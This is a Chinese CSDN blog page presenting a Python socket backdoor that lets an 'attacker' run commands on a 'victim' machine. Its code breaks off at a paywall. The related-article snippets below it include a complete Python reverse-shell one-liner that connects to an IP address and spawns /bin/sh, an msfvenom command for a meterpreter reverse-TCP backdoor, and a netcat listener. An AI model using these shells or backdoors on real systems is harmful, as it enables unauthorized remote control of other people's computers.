Python-基于socket实现的反向shell攻击后门

最新推荐文章于 2025-02-15 23:35:14 发布
最新推荐文章于 2025-02-15 23:35:14 发布
阅读量5k 收藏 4
点赞数
分类专栏: Python 文章标签: Python 反向shell 后门 socket 攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Vimor/article/details/52487371
版权
本文介绍了一个利用Python基于socket创建的反向shell攻击后门。通过在目标机器上运行backdoor.py,攻击者可以建立连接并执行远程指令。这是一种利用socket通信进行控制的实例。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下面给出一个基于socket实现的反向shell攻击,或者叫做控制工具吧,简单点说来就是在“受害者”电脑上留一个后门,“攻击者”可以通过这个连接这个socket实现在“受害者”电脑上执行各种指令,再直白一点就是一个socket通信的实例而已。


“受害者“端(后门):backdoor.py,这里充当一个socket服务端程序,主要实现连接的的监听、数据的收发和处理以及指令的执行

#!/usr/bin/python
import socket
import subprocess
import select
import sys

class BackDoorServer(object):
    def __init__(self, port):
        self.port = port
        self.srvsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.srvsock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.srvsock.bind(("", port))
        self.srvsock.listen(100)
        self.descriptors = [self.srvsock]
        self.sockInfoList = []
        print 'Listening on port %s' % port

    def run(self):
        while True:
            # 等待一个可读的socket事件
            try:
最低0.47元/天 解锁文章
Python3实现反向Shell
Pad0y的博客
09-28 2176
很多有名的远程控制工具都是基于C/S结构开发的,比如:灰鸽子、冰河、teamViewer等等。通常情况下是将Client作为控制端,Server作为被控端。这里笔者将采用反向连接的方式,将Server作为控制端,Client作为被控端。当然,这两种方式都可以实现功能。这里我采用反向连接的方式主要是考虑到肉鸡在内网中,我们是无法直接连接到被控端的。如果用反向连接的方式,尽管被控端在内网中,只要我们不在内网中,或者我们做了内网端口映射、动态域
Python3 实现可控制肉鸡的反向Shell
git1314的博客
09-29 912
Python3 实现可控制肉鸡的反向Shell 一、初识 1.1 用 Python 实现一个可以管理多个肉鸡的反向 Shell,为什么叫反向 Shell 呢?反向就是肉鸡作为Client主动连接到我们的Server端,以实现对多个远程主机的管理! 学习技能: 了解TCP协议 了解C/S结构程序设计 Python socket模块的使用 Python subprocess模块的...
实现反向shell
最新发布
code_father1的博客
02-15 114
目标机器无法被直接访问(例如防火墙限制),可以使用反向shell。这种i情况使用反向shell,目标机器主动连接到攻击者的机器。在攻击者的机器上运行。
Python Security 之 反向Shell
不急不躁
07-14 1302
首先我们先演示使用Python如何利用web服务器的功能,把文件从另一台主机传送过来。 我们假设你有一台傀儡主机,你现在想下载傀儡机上面的的文件。那么你就可以使用shell(或meterpreter)去访问这台傀儡机,你可以通过一行Python代码把傀儡机建立成为一个web服务器,然后下载傀儡机上面的文件.创建一个python HTTP服务器可以直接使用python的内建函数”SimpleHTTP
python 反向shell 编程
悦信安In4sec
03-14 521
服务端(监听端): 建立套接字编程 绑定端口 监听 连接到后门 发送信息(例如命令whoami之类的) 接收到后门返回的信息后门(客服端): 建立套接字 连接服务器 接收服务器返回的信息 处理后返回给服务器程序: 服务端(监听端):#!/usr/bin/python import socket s = socket.socket(socket.AF_INET,socket.SO
Python实现反向Shell
xingxsc的博客
02-08 644
反向Shell实现也是可以通过python实现,接下来会用到socket, subprocess来写。
WEB安全基础 - - -Linux反弹shell
weixin_67503304的博客
08-23 3266
详细讲解Linux反弹shell包含的NC正向shell,NC反向shell,bash反弹shell,无e参数反弹shell,Base64编码绕过,Telnet反弹shell,OpenSSL反弹443端口,流量加密传输
用msfvenom生成一个Python后门并提供这个后门的源代码
03-26
1. 打开终端,输入以下命令生成Python格式的反向TCP后门: ``` msfvenom -p python/meterpreter/reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f raw > backdoor.py ``` 将`<Attacker IP>`和`...
用py做一个反向tcp交互式shell
02-26
如果你要使用 Python实现反向 TCP 交互式 shell,可以使用 Pythonsocket 模块来创建套接字并建立连接。具体步骤如下: 1.在攻击者的计算机上运行一个监听程序,等待目标主机连接。可以使用 Pythonsocket...
基于DNS的反向Shell
手牵手科技
04-19 533
Chashell是一个由Go编写的基于DNS进行通信的反向shell。它可用于绕过防火墙或严格限制的网络。 它带有一个名为chaserv的多客户端控制服务器。 chashell 通信安全 每个数据包都使用对称加密(XSalsa20 + Poly1305)进行加密,客户端和服务器之间使用共享密钥。 我们计划在未来实现非对称加密。 协议 Chashell使用Protocol Buffers序列化消息进...
Python 反向 Shell 代码分析
weixin_46104215的博客
11-27 1171
import os,socket,subprocess; s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(('192.168.110.130',2222)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(['/bin/sh','-i']) s = socket.socket(socket.AF_INET,.
python反向连接shell,可穿透防火墙
07-30
python reverse_shell.py 反弹目的ip 3322 反弹目的ip 执行nc -l 3322 即可连结 被控端
python反弹shell(linux)
秋水的博客
10-02 3204
第一种代码如下 标准输入 (stdin) :代码为 0 ,使用 < 或 << 标准输出 (stdout):代码为 1 ,使用 > 或 >> 标准错误输出(stderr):代码为 2 ,使用 2> 或 2>> import socket,subprocess,os s=socket.socket(socket.AF_...
python反向连接
时光凉春衫薄的博客
10-17 533
&#13; https://blog.youkuaiyun.com/u010726042/article/details/73565068&#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13; &#13;
PythonSocket完成反向shell控制计算机
weixin_39098318的博客
03-26 459
背景 记起有个学期老师教网络攻防讲到了反向shell,从当时的看不懂老师给的代码到现在自己用写一个,这大概就是成长吧! 一、思路 反向shell一般都是由C/S结构发生,我理解的意思大概就是别人说在一包糖里面拿一颗,结果却拿了一整包。先由服务端监听,当有人连接上我们时,我们再通过这个连接发送指令给客户端执行,执行完之后反馈消息给我们。 总体思路: S:监听->等待->上钩->发送...
python 反向连接后门
Yatere的天平秤
10-30 1681
1)首先daemon化2)然后用 netstat命令,检测是否指定的IP(192.168.1.111)连接上,有,则激活无,则睡眠几分钟(这个时间可根据需要自行调节)3)激活后,开一个子进程,创建socket,与运行了监听程序的IP进行连接,并执行一个shell,将该shell的输入输出重定向到socket.4)父进程则等待 shell子进程的执行,如果执行完毕,就继续 检测周而复始…#!/usr
黑客零基础第一章--反向shell
ShadowBlade
08-09 5089
一篇文章叫你完全掌握反向shell
反向Socket连接
十年磨一剑,霜刃未曾试!
03-24 2394
<br />mark一下,以后的开发过程中可能会经常用到socket相关的东西,所以mark一下最基础的东西。<br /> <br />//服务端<br /> <br />#include <stdio.h><br />#include <windows.h><br />#pragma comment(lib,"ws2_32.lib")<br />void main()<br />{<br /> //初始化套接字版本<br /> WSAData wsaData;<br /> WSAStartup(MAKEW
Python安全之编写反弹连接‘免杀’后门
weixin_43853965的博客
01-07 1447
生成后门的工具: 虽然在WEB安全专栏,不过今天要编写的是一个二进制后门,而不是WEB后门。按惯例还是来一段KALI里面的“免杀”后门生成工具,大名鼎鼎的metasploit: 方法一msfconsole: msf5 > use windows/shell/reverse_tcp msf5 payload(windows/shell/reverse_tcp) > set lhost...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值